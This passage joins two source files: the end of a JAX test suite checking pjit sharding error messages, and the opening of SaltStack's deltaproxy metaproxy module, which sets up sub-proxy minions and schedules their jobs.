  """Return a regex fragment that literally matches ``str(s)``.

  Used to embed PartitionSpec reprs inside assertRaisesRegex patterns.
  ``re.escape`` covers '(' and ')' exactly like the previous manual
  ``.replace`` calls, and additionally escapes any other regex
  metacharacter (e.g. '.', '*') that may appear in the repr.
  """
  return re.escape(str(s))
class PJitErrorTest(jtu.JaxTestCase):
    """Tests that invalid pjit / with_sharding_constraint specifications
    raise with clear, user-facing error messages."""

    # --- dimension size not divisible by the mesh axis size ---

    @check_1d_2d_mesh(set_mesh=True)
    def testNonDivisibleArgs(self, mesh, resources):
        # Dimension 0 has size 3, which no product of mesh axis sizes divides.
        x = jnp.ones((3, 2))
        spec = P(resources, None)
        mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
        with self.assertRaisesRegex(
                ValueError,
                r"One of pjit arguments.*" + spec_regex(spec) + r".*"
                r"implies that the size of its dimension 0 should be "
                r"divisible by " + mesh_size + r", but it is equal to 3"):
            pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)

    @check_1d_2d_mesh(set_mesh=True)
    def testNonDivisibleOuts(self, mesh, resources):
        # Same as above, but the bad spec is on the output side.
        x = jnp.ones((3, 2))
        spec = P(resources, None)
        mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
        with self.assertRaisesRegex(
                ValueError,
                r"One of pjit outputs.*" + spec_regex(spec) + r".*"
                r"implies that the size of its dimension 0 should be "
                r"divisible by " + mesh_size + r", but it is equal to 3"):
            pjit(lambda x: x, in_axis_resources=None,
                 out_axis_resources=P(resources, None))(x)

    @check_1d_2d_mesh(set_mesh=True)
    def testNonDivisibleConstraint(self, mesh, resources):
        # Same failure mode via with_sharding_constraint inside the jitted body.
        x = jnp.ones((3, 2))
        spec = P(resources,)
        mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
        with self.assertRaisesRegex(
                ValueError,
                r"One of with_sharding_constraint arguments"
                r".*" + spec_regex(spec) + r".*implies that the size of "
                r"its dimension 0 should be divisible by " + mesh_size +
                r", but it is equal to 3"):
            pjit(lambda x: with_sharding_constraint(x, spec),
                 in_axis_resources=None, out_axis_resources=None)(x)

    # --- spec references a mesh axis that does not exist ---
    # The active mesh only defines axis 'z'; the specs reference 'x'/'y'.

    @check_1d_2d_mesh(set_mesh=False)
    @jtu.with_mesh([('z', 1)])
    def testUndefinedResourcesArgs(self, mesh, resources):
        x = jnp.ones((2, 2))
        spec = P(resources,)
        with self.assertRaisesRegex(
                ValueError,
                r"One of pjit arguments.*" + spec_regex(spec) + r", "
                r"but resource axis x is undefined."):
            pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)

    @check_1d_2d_mesh(set_mesh=False)
    @jtu.with_mesh([('z', 1)])
    def testUndefinedResourcesOuts(self, mesh, resources):
        x = jnp.ones((2, 2))
        spec = P(resources,)
        with self.assertRaisesRegex(
                ValueError,
                r"One of pjit outputs.*" + spec_regex(spec) + r", "
                r"but resource axis x is undefined."):
            pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)

    @check_1d_2d_mesh(set_mesh=False)
    @jtu.with_mesh([('z', 1)])
    def testUndefinedResourcesConstraint(self, mesh, resources):
        x = jnp.ones((2, 2))
        spec = P(resources,)
        with self.assertRaisesRegex(
                ValueError,
                r"One of with_sharding_constraint arguments"
                r".*" + spec_regex(spec) + r", but resource axis "
                r"x is undefined."):
            pjit(lambda x: with_sharding_constraint(x, spec),
                 in_axis_resources=None, out_axis_resources=None)(x)

    # --- spec implies a higher rank than the value has ---

    @jtu.with_mesh([('x', 2), ('y', 1)])
    def testRankTooLowArgs(self):
        x = jnp.arange(2)  # rank 1, but spec names two dimensions
        spec = P('x', 'y')
        error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
                 r"that it has a rank of at least 2, but it is 1")
        with self.assertRaisesRegex(ValueError, error):
            pjit(lambda x: x.sum(), in_axis_resources=spec,
                 out_axis_resources=None)(x)

    @jtu.with_mesh([('x', 2), ('y', 1)])
    def testRankTooLowOuts(self):
        x = jnp.arange(2)
        spec = P('x', 'y')
        # sum() produces a rank-0 output, so the 2-dim output spec cannot apply.
        error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
                 r"that it has a rank of at least 2, but it is 0")
        with self.assertRaisesRegex(ValueError, error):
            pjit(lambda x: x.sum(), in_axis_resources=None,
                 out_axis_resources=spec)(x)

    @jtu.with_mesh([('x', 2), ('y', 1)])
    def testRankTooLowConstraint(self):
        x = jnp.arange(2)
        spec = P('x', 'y')
        error = (r"One of with_sharding_constraint arguments " +
                 r"was given.*" + spec_regex(spec) + r", which implies "
                 r"that it has a rank of at least 2, but it is 1")
        with self.assertRaisesRegex(ValueError, error):
            pjit(lambda x: with_sharding_constraint(x, spec),
                 in_axis_resources=None, out_axis_resources=None)(x)

    # --- the same mesh axis used for more than one dimension ---

    @jtu.with_mesh([('x', 2), ('y', 1)])
    def testRepeatedInResources(self):
        x = jnp.arange(2)
        for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
            error = (r"A single in_axis_resources specification can map every mesh "
                     r"axis to at most one positional dimension, but " +
                     spec_regex(spec) + " has duplicate entries for `x`")
            with self.assertRaisesRegex(ValueError, error):
                pjit(lambda x: x, in_axis_resources=spec,
                     out_axis_resources=None)(x)

    @jtu.with_mesh([('x', 2), ('y', 1)])
    def testRepeatedOutResources(self):
        x = jnp.arange(2)
        for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
            error = (r"A single out_axis_resources specification can map every mesh "
                     r"axis to at most one positional dimension, but " +
                     spec_regex(spec) + " has duplicate entries for `x`")
            with self.assertRaisesRegex(ValueError, error):
                pjit(lambda x: x, in_axis_resources=None,
                     out_axis_resources=spec)(x)

    # --- interaction with xmap: a mesh axis cannot be used by both ---

    @jtu.with_mesh([('x', 2)])
    def testInputShardsXMapAxis(self):
        spec = P('x')
        f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec,
                      out_axis_resources=None),
                 in_axes=['i', ...], out_axes=['i', ...],
                 axis_resources={'i': 'x'})
        x = jnp.arange(4).reshape((2, 2))
        error = (r"pjit input has an axis resources specification of " +
                 spec_regex(spec) + r" that uses one or more mesh axes already used by "
                 r"xmap to partition a named axis appearing in its named_shape \(both "
                 r"use mesh axes `x`\)")
        with self.assertRaisesRegex(JAXTypeError, error):
            f(x)

    @jtu.with_mesh([('x', 2)])
    def testOutputShardsXMapAxis(self):
        spec = P('x')
        f = xmap(pjit(lambda x: x + 2, in_axis_resources=None,
                      out_axis_resources=spec),
                 in_axes=['i', ...], out_axes=['i', ...],
                 axis_resources={'i': 'x'})
        x = jnp.arange(4).reshape((2, 2))
        error = (r"pjit output has an axis resources specification of " +
                 spec_regex(spec) + r" that uses one or more mesh axes already used by "
                 r"xmap to partition a named axis appearing in its named_shape \(both "
                 r"use mesh axes `x`\)")
        with self.assertRaisesRegex(JAXTypeError, error):
            f(x)

    @jtu.with_mesh([('x', 2)])
    def testConstraintShardsXMapAxis(self):
        spec = P('x')
        f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
                 in_axes=['i', ...], out_axes=['i', ...],
                 axis_resources={'i': 'x'})
        x = jnp.arange(4).reshape((2, 2))
        error = (r"with_sharding_constraint input has an axis resources specification of " +
                 spec_regex(spec) + r" that uses one or more mesh axes already used by "
                 r"xmap to partition a named axis appearing in its named_shape \(both "
                 r"use mesh axes `x`\)")
        with self.assertRaisesRegex(JAXTypeError, error):
            f(x)

    @jtu.with_mesh([('x', 2)])
    def testCatchesInnerXMapErrors(self):
        # Both xmap axes map to mesh axis 'x' -- the inner xmap must raise.
        f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']),
                      out_axes=['i', 'j'],
                      axis_resources={'i': 'x', 'j': 'x'}),
                 in_axis_resources=None, out_axis_resources=None)
        x = jnp.arange(4)
        with self.assertRaises(JAXTypeError):
            f(x, x)

    def testEmptyMesh(self):
        # Calling pjit outside any mesh context must fail with a helpful hint.
        error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
                 r"at the call site?")
        with self.assertRaisesRegex(RuntimeError, error):
            pjit(lambda x: x, in_axis_resources=None,
                 out_axis_resources=None)(jnp.arange(4))

    @jtu.with_mesh([('x', 2)])
    def testAxisResourcesMismatch(self):
        # Spec pytrees must be prefixes of the argument/output pytrees.
        x = jnp.ones([])
        p = [None, None, None]
        pjit(lambda x: x, (p,), p)([x, x, x])  # OK
        error = re.escape(
            r"pjit in_axis_resources specification must be a tree prefix of the "
            r"corresponding value, got specification (None, None, None) for value "
            r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
            r"non-trivial pytrees should always be wrapped in a tuple representing "
            r"the argument list.")
        with self.assertRaisesRegex(ValueError, error):
            pjit(lambda x, y: x, p, p)(x, x)  # Error, but make sure we hint at tupling
        # TODO(apaszke): Disable implicit list casts and enable this
        # error = re.escape(
        # r"pjit in_axis_resources specification must be a tree prefix of the "
        # r"corresponding value, got specification (None, None, None) for value "
        # r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
        # r"are non-trivial pytrees should always be wrapped in a tuple representing "
        # r"the argument list. In particular, you're passing in a single argument "
        # r"which means that pjit in_axis_resources might need to be wrapped in a "
        # r"singleton tuple.")
        # with self.assertRaisesRegex(ValueError, error):
        # pjit(lambda x: x, p, p)([x, x, x])  # Error, but make sure we hint at singleton tuple
        error = re.escape(
            r"pjit out_axis_resources specification must be a tree prefix of the "
            r"corresponding value, got specification [[None, None, None], None] for "
            r"value tree PyTreeDef([*, *, *]).")
        with self.assertRaisesRegex(ValueError, error):
            # Error, we raise a generic tree mismatch message
            pjit(lambda x: x, (p,), [p, None])([x, x, x])

    @jtu.with_mesh([('x', 2)])
    def testNestedDifferentResources(self):
        # Entering a different physical mesh inside an outer pjit is forbidden.
        @partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
        def f(x):
            with mesh(np.array([jax.local_devices()[0]]), ('x')):
                @partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
                def h(x):
                    return x
                return h(x)
        xshape = (2, 5, 6)
        x = jnp.arange(np.prod(xshape)).reshape(xshape)
        with self.assertRaisesRegex(
                RuntimeError,
                "Changing the physical mesh is not allowed.*"):
            f(x)
class UtilTest(jtu.JaxTestCase):
    """Unit tests for pjit/pxla helper utilities (no device execution)."""

    def testOpShardingRoundTrip(self):
        """PartitionSpec -> OpSharding proto -> PartitionSpec is lossless."""
        # Fake devices are enough: only ids are needed to build the proto.
        FakeDevice = namedtuple('FakeDevice', ['id'])
        mesh_named_shape = OrderedDict(
            [('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
        mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
        devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
        mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))

        dims = 5
        aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)

        def roundtrip(spec):
            op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
            parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
            # The parsed spec may be padded with empty tuples up to the rank.
            self.assertEqual(parsed_spec[:len(spec)], spec)
            self.assertEqual(parsed_spec[len(spec):],
                             ((),) * (len(parsed_spec) - len(spec)))

        special_specs = [P()]
        for spec in special_specs:
            roundtrip(spec)

        # Fuzz: random assignments of mesh axes to positional dimensions.
        rng = self.rng()
        for i in range(100):
            spec = [()] * dims
            for axis in rng.permutation(mesh_axes)[
                    :rng.randint(low=1, high=len(mesh_axes) + 1)]:
                spec[rng.choice(dims)] += (axis,)
            roundtrip(P(*spec))

    @parameterized.named_parameters(
        ("linear", {'x': 0, 'y': 1, 'z': 2}, (('x',), ('y',), ('z',))),
        ("combine", {'x': 0, 'y': 0, 'z': 1}, (('x', 'y'), ('z',))),
        ("skip", {'x': 0, 'y': 0, 'z': 2}, (('x', 'y'), None, ('z',))),
        ("multi_skip", {'x': 0, 'y': 1, 'z': 3}, (('x',), ('y',), None, ('z',))),
    )
    def test_array_mapping_to_axis_resources(self, inp, expected_out):
        # Maps {mesh_axis: positional_dim} to a positional axis-resources tuple.
        self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)

    def test_get_input_metadata_fully_replicated(self):
        """Fully replicated inputs: every device gets full-slice indices."""
        global_mesh = create_global_mesh((2, 2), ('x', 'y'))
        global_in_aval1 = jax.core.ShapedArray((4, 4), jnp.int32)
        global_in_aval2 = jax.core.ShapedArray((4, 4, 4), jnp.int32)
        global_in_aval3 = jax.core.ShapedArray((), jnp.int32)
        in_avals = [global_in_aval1, global_in_aval2, global_in_aval3]

        _, out_indices, _ = pxla._get_input_metadata(
            in_avals, global_mesh, [{}, {}, {}], [False, False, False])

        self.assertLen(out_indices, len(in_avals))
        # One index entry per local device...
        self.assertTrue(all(len(out) == len(global_mesh.local_devices)
                            for out in out_indices))
        # ...each with one slice per aval dimension...
        self.assertTrue(all(len(i) == aval.ndim
                            for out, aval in safe_zip(out_indices, in_avals)
                            for i in out))
        # ...and each slice covering the whole dimension (replication).
        self.assertTrue(all(i == (slice(None),) * aval.ndim
                            for out, aval in safe_zip(out_indices, in_avals)
                            for i in out))
# Standard JAX test entry point: run under absltest with JAX's test loader.
if __name__ == '__main__':
    absltest.main(testLoader=jtu.JaxTestLoader())
|
deltaproxy.py | #
# Proxy minion metaproxy modules
#
import copy
import logging
import os
import sys
import threading
import traceback
import types
import salt
import salt.beacons
import salt.cli.daemons
import salt.client
import salt.config
import salt.crypt
import salt.defaults.exitcodes
import salt.engines
import salt.loader
import salt.log.setup
import salt.minion
import salt.payload
import salt.pillar
import salt.serializers.msgpack
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import tornado.gen
import tornado.ioloop
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltSystemExit,
)
from salt.minion import ProxyMinion
from salt.utils.event import tagify
from salt.utils.process import SignalHandlingProcess
# Module-level logger for the deltaproxy metaproxy implementation.
log = logging.getLogger(__name__)
def post_master_init(self, master):
    """
    Finish initialization after a deltaproxy (control) proxy minion
    has connected to a master.

    This is primarily loading modules, pillars, etc. (since they need
    to know which master they connected to).  It then loads the controlling
    proxy module, wires up scheduling jobs (mine, master alive/failback,
    proxy keepalive), and finally instantiates and initializes one
    sub-ProxyMinion per id listed in ``opts['proxy']['ids']``.

    NOTE: this is a generator-style coroutine (``yield`` on async pillar
    calls); it must be driven by the tornado IO loop.

    :param master: the master this minion connected to; written back into
        ``self.opts['master']`` in case pillar compilation overwrote it.
    """
    if self.connected:
        # Compile pillar from the master we just connected to.
        self.opts["pillar"] = yield salt.pillar.get_async_pillar(
            self.opts,
            self.opts["grains"],
            self.opts["id"],
            saltenv=self.opts["saltenv"],
            pillarenv=self.opts.get("pillarenv"),
        ).compile_pillar()

        # Ensure that the value of master is the one we passed in.
        # if pillar_opts is enabled then master could be overwritten
        # when compile_pillar is run.
        self.opts["master"] = master

    tag = "salt/deltaproxy/start"
    self._fire_master(tag=tag)

    # A proxy configuration is mandatory, either in pillar or in opts.
    if "proxy" not in self.opts["pillar"] and "proxy" not in self.opts:
        errmsg = (
            "No proxy key found in pillar or opts for id {}. Check your pillar/opts "
            "configuration and contents. Salt-proxy aborted.".format(self.opts["id"])
        )
        log.error(errmsg)
        self._running = False
        raise SaltSystemExit(code=-1, msg=errmsg)

    if "proxy" not in self.opts:
        self.opts["proxy"] = self.opts["pillar"]["proxy"]

    # Merge the compiled pillar into opts (strategy comes from config).
    self.opts = salt.utils.dictupdate.merge(
        self.opts,
        self.opts["pillar"],
        strategy=self.opts.get("proxy_merge_pillar_in_opts_strategy"),
        merge_lists=self.opts.get("proxy_deep_merge_pillar_in_opts", False),
    )

    if self.opts.get("proxy_mines_pillar"):
        # Even when not required, some details such as mine configuration
        # should be merged anyway whenever possible.
        if "mine_interval" in self.opts["pillar"]:
            self.opts["mine_interval"] = self.opts["pillar"]["mine_interval"]
        if "mine_functions" in self.opts["pillar"]:
            general_proxy_mines = self.opts.get("mine_functions", [])
            specific_proxy_mines = self.opts["pillar"]["mine_functions"]
            try:
                self.opts["mine_functions"] = general_proxy_mines + specific_proxy_mines
            except TypeError as terr:
                # Incompatible types (e.g. list + dict): keep the existing
                # mine_functions rather than failing startup.
                log.error(
                    "Unable to merge mine functions from the pillar in the opts, for proxy %s",
                    self.opts["id"],
                )

    fq_proxyname = self.opts["proxy"]["proxytype"]

    # Need to load the modules so they get all the dunder variables
    (
        self.functions,
        self.returners,
        self.function_errors,
        self.executors,
    ) = self._load_modules()

    # we can then sync any proxymodules down from the master
    # we do a sync_all here in case proxy code was installed by
    # SPM or was manually placed in /srv/salt/_modules etc.
    self.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])

    # Pull in the utils
    self.utils = salt.loader.utils(self.opts)

    # Then load the proxy module
    self.proxy = salt.loader.proxy(self.opts, utils=self.utils)

    # And re-load the modules so the __proxy__ variable gets injected
    (
        self.functions,
        self.returners,
        self.function_errors,
        self.executors,
    ) = self._load_modules()
    self.functions.pack["__proxy__"] = self.proxy
    self.proxy.pack["__salt__"] = self.functions
    self.proxy.pack["__ret__"] = self.returners
    self.proxy.pack["__pillar__"] = self.opts["pillar"]

    # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and
    # __proxy__ needs __utils__)
    self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
    self.proxy.pack["__utils__"] = self.utils

    # Reload all modules so all dunder variables are injected
    self.proxy.reload_modules()

    # Start engines here instead of in the Minion superclass __init__
    # This is because we need to inject the __proxy__ variable but
    # it is not setup until now.
    self.io_loop.spawn_callback(
        salt.engines.start_engines, self.opts, self.process_manager, proxy=self.proxy
    )

    # The proxy module must implement at least init() and shutdown().
    proxy_init_func_name = "{}.init".format(fq_proxyname)
    proxy_shutdown_func_name = "{}.shutdown".format(fq_proxyname)
    if (
        proxy_init_func_name not in self.proxy
        or proxy_shutdown_func_name not in self.proxy
    ):
        errmsg = (
            "Proxymodule {} is missing an init() or a shutdown() or both. "
            "Check your proxymodule. Salt-proxy aborted.".format(fq_proxyname)
        )
        log.error(errmsg)
        self._running = False
        raise SaltSystemExit(code=-1, msg=errmsg)

    # Optional per-proxymodule executors hook; defaults to an empty list.
    self.module_executors = self.proxy.get(
        "{}.module_executors".format(fq_proxyname), lambda: []
    )()
    proxy_init_fn = self.proxy[proxy_init_func_name]
    proxy_init_fn(self.opts)

    self.opts["grains"] = salt.loader.grains(self.opts, proxy=self.proxy)
    self.mod_opts = self._prep_mod_opts()
    self.matchers = salt.loader.matchers(self.opts)
    self.beacons = salt.beacons.Beacon(self.opts, self.functions)
    uid = salt.utils.user.get_uid(user=self.opts.get("user", None))
    self.proc_dir = salt.minion.get_proc_dir(self.opts["cachedir"], uid=uid)

    if self.connected and self.opts["pillar"]:
        # The pillar has changed due to the connection to the master.
        # Reload the functions so that they can use the new pillar data.
        (
            self.functions,
            self.returners,
            self.function_errors,
            self.executors,
        ) = self._load_modules()
        if hasattr(self, "schedule"):
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    if not hasattr(self, "schedule"):
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners,
            cleanup=[salt.minion.master_event(type="alive")],
            proxy=self.proxy,
            _subprocess_list=self.subprocess_list,
        )

    # add default scheduling jobs to the minions scheduler
    if self.opts["mine_enabled"] and "mine.update" in self.functions:
        self.schedule.add_job(
            {
                "__mine_interval": {
                    "function": "mine.update",
                    "minutes": self.opts["mine_interval"],
                    "jid_include": True,
                    "maxrunning": 2,
                    "run_on_start": True,
                    "return_job": self.opts.get("mine_return_job", False),
                }
            },
            persist=True,
        )
        log.info("Added mine.update to scheduler")
    else:
        self.schedule.delete_job("__mine_interval", persist=True)

    # add master_alive job if enabled
    if self.opts["transport"] != "tcp" and self.opts["master_alive_interval"] > 0:
        self.schedule.add_job(
            {
                salt.minion.master_event(type="alive", master=self.opts["master"]): {
                    "function": "status.master",
                    "seconds": self.opts["master_alive_interval"],
                    "jid_include": True,
                    "maxrunning": 1,
                    "return_job": False,
                    "kwargs": {"master": self.opts["master"], "connected": True},
                }
            },
            persist=True,
        )
        if (
            self.opts["master_failback"]
            and "master_list" in self.opts
            and self.opts["master"] != self.opts["master_list"][0]
        ):
            # Not connected to the preferred master: schedule failback pings.
            self.schedule.add_job(
                {
                    salt.minion.master_event(type="failback"): {
                        "function": "status.ping_master",
                        "seconds": self.opts["master_failback_interval"],
                        "jid_include": True,
                        "maxrunning": 1,
                        "return_job": False,
                        "kwargs": {"master": self.opts["master_list"][0]},
                    }
                },
                persist=True,
            )
        else:
            self.schedule.delete_job(
                salt.minion.master_event(type="failback"), persist=True
            )
    else:
        self.schedule.delete_job(
            salt.minion.master_event(type="alive", master=self.opts["master"]),
            persist=True,
        )
        self.schedule.delete_job(
            salt.minion.master_event(type="failback"), persist=True
        )

    # proxy keepalive for the controlling proxy
    proxy_alive_fn = fq_proxyname + ".alive"
    if (
        proxy_alive_fn in self.proxy
        and "status.proxy_reconnect" in self.functions
        and self.opts.get("proxy_keep_alive", True)
    ):
        # if `proxy_keep_alive` is not specified, or is set to False, do not
        # schedule the reconnect job
        self.schedule.add_job(
            {
                "__proxy_keepalive": {
                    "function": "status.proxy_reconnect",
                    "minutes": self.opts.get(
                        "proxy_keep_alive_interval", 1
                    ),  # by default, check once per minute
                    "jid_include": True,
                    "maxrunning": 1,
                    "return_job": False,
                    "kwargs": {"proxy_name": fq_proxyname},
                }
            },
            persist=True,
        )
        self.schedule.enable_schedule()
    else:
        self.schedule.delete_job("__proxy_keepalive", persist=True)

    # Sync the grains here so the proxy can communicate them to the master
    self.functions["saltutil.sync_grains"](saltenv="base")
    self.grains_cache = self.opts["grains"]

    # Now setup the deltaproxies: per-subproxy state keyed by subproxy id.
    self.deltaproxy = {}
    self.deltaproxy_opts = {}
    self.deltaproxy_objs = {}
    self.proxy_grains = {}
    self.proxy_pillar = {}
    self.proxy_context = {}
    self.add_periodic_callback("cleanup", self.cleanup_subprocesses)

    for _id in self.opts["proxy"].get("ids", []):
        # NOTE(review): control_id is assigned but never used below -- confirm
        # before removing.
        control_id = self.opts["id"]
        proxyopts = self.opts.copy()
        proxyopts["id"] = _id

        proxyopts = salt.config.proxy_config(
            self.opts["conf_file"], defaults=proxyopts, minion_id=_id
        )
        proxyopts["id"] = proxyopts["proxyid"] = _id

        proxyopts["subproxy"] = True

        self.proxy_context[_id] = {"proxy_id": _id}

        # We need grains first to be able to load pillar, which is where we keep
        # the proxy configurations
        self.proxy_grains[_id] = salt.loader.grains(
            proxyopts, proxy=self.proxy, context=self.proxy_context[_id]
        )
        self.proxy_pillar[_id] = yield salt.pillar.get_async_pillar(
            proxyopts,
            self.proxy_grains[_id],
            _id,
            saltenv=proxyopts["saltenv"],
            pillarenv=proxyopts.get("pillarenv"),
        ).compile_pillar()

        proxyopts["proxy"] = self.proxy_pillar[_id].get("proxy", {})

        # Remove ids so a subproxy cannot itself spawn subproxies
        proxyopts["proxy"].pop("ids", None)

        proxyopts["pillar"] = self.proxy_pillar[_id]
        proxyopts["grains"] = self.proxy_grains[_id]

        proxyopts["hash_id"] = self.opts["id"]

        _proxy_minion = ProxyMinion(proxyopts)
        _proxy_minion.proc_dir = salt.minion.get_proc_dir(
            proxyopts["cachedir"], uid=uid
        )

        _proxy_minion.proxy = salt.loader.proxy(
            proxyopts, utils=self.utils, context=self.proxy_context[_id]
        )
        _proxy_minion.subprocess_list = self.subprocess_list

        # And load the modules
        (
            _proxy_minion.functions,
            _proxy_minion.returners,
            _proxy_minion.function_errors,
            _proxy_minion.executors,
        ) = _proxy_minion._load_modules(
            opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
        )

        # we can then sync any proxymodules down from the master
        # we do a sync_all here in case proxy code was installed by
        # SPM or was manually placed in /srv/salt/_modules etc.
        _proxy_minion.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])

        # And re-load the modules so the __proxy__ variable gets injected
        (
            _proxy_minion.functions,
            _proxy_minion.returners,
            _proxy_minion.function_errors,
            _proxy_minion.executors,
        ) = _proxy_minion._load_modules(
            opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
        )
        _proxy_minion.functions.pack["__proxy__"] = _proxy_minion.proxy
        _proxy_minion.proxy.pack["__salt__"] = _proxy_minion.functions
        _proxy_minion.proxy.pack["__ret__"] = _proxy_minion.returners
        _proxy_minion.proxy.pack["__pillar__"] = proxyopts["pillar"]
        _proxy_minion.proxy.pack["__grains__"] = proxyopts["grains"]

        # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and
        # __proxy__ needs __utils__)
        _proxy_minion.proxy.utils = salt.loader.utils(
            proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
        )
        _proxy_minion.proxy.pack["__utils__"] = _proxy_minion.proxy.utils

        # Reload all modules so all dunder variables are injected
        _proxy_minion.proxy.reload_modules()

        _proxy_minion.connected = True

        _fq_proxyname = proxyopts["proxy"]["proxytype"]

        proxy_init_fn = _proxy_minion.proxy[_fq_proxyname + ".init"]
        proxy_init_fn(proxyopts)

        # Reload the grains
        self.proxy_grains[_id] = salt.loader.grains(
            proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
        )
        proxyopts["grains"] = self.proxy_grains[_id]

        if not hasattr(_proxy_minion, "schedule"):
            _proxy_minion.schedule = salt.utils.schedule.Schedule(
                proxyopts,
                _proxy_minion.functions,
                _proxy_minion.returners,
                cleanup=[salt.minion.master_event(type="alive")],
                proxy=_proxy_minion.proxy,
                new_instance=True,
                _subprocess_list=_proxy_minion.subprocess_list,
            )

        self.deltaproxy_objs[_id] = _proxy_minion
        self.deltaproxy_opts[_id] = copy.deepcopy(proxyopts)

        # proxy keepalive for this subproxy
        _proxy_alive_fn = _fq_proxyname + ".alive"
        if (
            _proxy_alive_fn in _proxy_minion.proxy
            and "status.proxy_reconnect" in self.deltaproxy_objs[_id].functions
            and proxyopts.get("proxy_keep_alive", True)
        ):
            # if `proxy_keep_alive` is not specified, or is set to False, do not
            # schedule the reconnect job
            _proxy_minion.schedule.add_job(
                {
                    "__proxy_keepalive": {
                        "function": "status.proxy_reconnect",
                        "minutes": proxyopts.get(
                            "proxy_keep_alive_interval", 1
                        ),  # by default, check once per minute
                        "jid_include": True,
                        "maxrunning": 1,
                        "return_job": False,
                        "kwargs": {"proxy_name": _fq_proxyname},
                    }
                },
                persist=True,
            )
            _proxy_minion.schedule.enable_schedule()
        else:
            _proxy_minion.schedule.delete_job("__proxy_keepalive", persist=True)

    self.ready = True
def target(cls, minion_instance, opts, data, connected):
    """
    Handle targeting of the minion.

    Dispatches the published job to ProxyMinion._thread_multi_return when
    ``data['fun']`` carries multiple functions, otherwise to
    ProxyMinion._thread_return.
    """
    log.debug(
        "Deltaproxy minion_instance %s(ID: %s). Target: %s",
        minion_instance,
        minion_instance.opts["id"],
        opts["id"],
    )

    # Lazily create the job/proc directory the first time this instance runs a job.
    if not hasattr(minion_instance, "proc_dir"):
        uid = salt.utils.user.get_uid(user=opts.get("user", None))
        minion_instance.proc_dir = salt.minion.get_proc_dir(opts["cachedir"], uid=uid)

    with tornado.stack_context.StackContext(minion_instance.ctx):
        handler = (
            ProxyMinion._thread_multi_return
            if isinstance(data["fun"], (tuple, list))
            else ProxyMinion._thread_return
        )
        handler(minion_instance, opts, data)
def thread_return(cls, minion_instance, opts, data):
    """
    This method should be used as a threading target, start the actual
    minion side execution.

    Executes ``data['fun']`` through the configured executor chain, builds
    the return dict (``return``/``retcode``/``success``/``out``), publishes
    it back to the master, and hands it to any configured returners.
    """
    fn_ = os.path.join(minion_instance.proc_dir, data["jid"])

    if opts["multiprocessing"] and not salt.utils.platform.is_windows():
        # Shutdown the multiprocessing before daemonizing
        salt.log.setup.shutdown_multiprocessing_logging()
        # NOTE(review): the comments mention daemonizing but no
        # daemonize_if() call appears between them here (unlike
        # thread_multi_return) -- confirm whether that is intentional.
        # Reconfigure multiprocessing logging after daemonizing
        salt.log.setup.setup_multiprocessing_logging()

    salt.utils.process.appendproctitle(
        "{}._thread_return {}".format(cls.__name__, data["jid"])
    )

    # Record job metadata (including our pid) in the proc dir for job tracking.
    sdata = {"pid": os.getpid()}
    sdata.update(data)
    log.info("Starting a new job with PID %s", sdata["pid"])
    with salt.utils.files.fopen(fn_, "w+b") as fp_:
        fp_.write(salt.payload.dumps(sdata))

    ret = {"success": False}
    function_name = data["fun"]

    # Executor chain: job data overrides instance config, which overrides opts.
    executors = (
        data.get("module_executors")
        or getattr(minion_instance, "module_executors", [])
        or opts.get("module_executors", ["direct_call"])
    )
    # True when any executor declares it can handle a function that is not
    # present in the loaded modules.
    allow_missing_funcs = any(
        [
            minion_instance.executors["{}.allow_missing_func".format(executor)](
                function_name
            )
            for executor in executors
            if "{}.allow_missing_func".format(executor) in minion_instance.executors
        ]
    )

    if function_name in minion_instance.functions or allow_missing_funcs is True:
        try:
            # Blackout check: pillar first, then grains.
            minion_blackout_violation = False
            if minion_instance.connected and minion_instance.opts["pillar"].get(
                "minion_blackout", False
            ):
                whitelist = minion_instance.opts["pillar"].get(
                    "minion_blackout_whitelist", []
                )
